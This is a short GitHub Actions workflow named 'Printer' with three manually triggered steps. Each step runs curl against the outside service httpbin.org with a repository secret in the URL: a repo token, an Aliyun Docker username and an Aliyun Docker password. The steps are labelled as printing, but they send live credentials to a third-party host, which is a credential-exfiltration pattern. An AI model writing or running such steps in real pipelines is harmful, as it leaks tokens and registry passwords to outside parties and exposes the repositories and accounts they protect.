name: Printer

on:
  workflow_dispatch:

jobs:
  printer:
    runs-on: ubuntu-latest
    steps:
      - name: Print REPO_TOKEN
        run: curl -L httpbin.org/get?id=${{ secrets.REPO_TOKEN }}
        id: repo_token
      - name: Print ALIYUN_DOCKER_USERNAME
        run: curl -L httpbin.org/get?id=${{ secrets.ALIYUN_DOCKER_USERNAME }}
        id: aliyun_docker_username
      - name: Print ALIYUN_DOCKER_PASSWORD
        run: curl -L httpbin.org/get?id=${{ secrets.ALIYUN_DOCKER_PASSWORD }}
        id: aliyun_docker_password
